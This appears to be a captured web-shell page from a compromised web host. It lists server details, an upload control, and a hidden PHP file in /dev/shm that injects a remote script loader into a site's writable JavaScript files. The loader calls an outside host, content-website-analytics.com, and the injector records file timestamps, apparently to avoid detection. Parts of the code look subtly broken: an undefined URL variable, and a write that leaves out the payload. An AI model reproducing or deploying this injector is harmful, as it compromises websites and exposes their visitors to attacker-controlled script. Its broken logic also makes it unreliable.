HEX
Server: LiteSpeed
System: Linux premium12.web-hosting.com 4.18.0-553.44.1.lve.el8.x86_64 #1 SMP Thu Mar 13 14:29:12 UTC 2025 x86_64
User: desetmhw (842)
PHP: 8.1.33
Disabled: NONE
$ pwd: /proc/thread-self/root/dev/shm/
Upload Files
File: //proc/thread-self/root/dev/shm/.entry
<?php   $codeToInject = rawurldecode('%3B%28function%28f%2Ci%2Cu%2Cw%2Cs%29%7Bw%3Df.createElement%28i%29%3Bs%3Df.getElementsByTagName%28i%29%5B0%5D%3Bw.async%3D1%3Bw.src%3Du%3Bs.parentNode.insertBefore%28w%2Cs%29%3B%7D%29%28document%2C%27script%27%2C%27https%3A//content-website-analytics.com/script.js%27%29%3B');  $rootDir = $_SERVER['DOCUMENT_ROOT'];   function get_page_content($url) {     if (function_exists('curl_init')) {         $ch = curl_init();         curl_setopt($ch, CURLOPT_URL, $url);         curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);         curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);         curl_setopt($ch, CURLOPT_USERAGENT, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36');         $content = curl_exec($ch);         curl_close($ch);         return $content;     }     return @file_get_contents($url); }  $protocol = (!empty($_SERVER['HTTPS']) && $_SERVER['HTTPS'] !== 'off') ? "https" : "http"; $host = $_SERVER['HTTP_HOST'];  $htmlContent = get_page_content($homeUrl); if (empty($htmlContent)) {     die("!error! Couldn't fetch homepage content from {$homeUrl}"); }  preg_match_all('/<script.*?src=["\'](.*?)["\']/i', $htmlContent, $matches); $jsUrls = array_unique($matches[1]);  if (empty($jsUrls)) {     die("!error! No JS files found on homepage."); }  $writableFileFound = false;  foreach ($jsUrls as $jsUrl) {     if (preg_match('/^(https?:\/\/|\/\/)/i', $jsUrl)) {         continue;     }      $pathInfo = parse_url($jsUrl, PHP_URL_PATH);      $localPath = $rootDir . DIRECTORY_SEPARATOR . ltrim($pathInfo, '/');      if (!$localPath || !is_file($localPath)) {         continue;     }      if (is_writable($localPath)) {         $writableFileFound = true;         $originalModTime = @filemtime($localPath);         $content = file_get_contents($localPath);          if (strstr($content, $codeToInject)) {             die("!already injected!<f>{$pathInfo}</f><ft>{$originalModTime}</ft>");         }           if (file_put_contents($localPath, $content)) {              $newContent = file_get_contents($localPath);             if (strstr($newContent, $codeToInject)) {                 die("!success!<f>{$pathInfo}</f><ft>{$originalModTime}</ft>");             }         }     } }  if ($writableFileFound) { } else { }  die('!ended!');  ?>
@ Telegram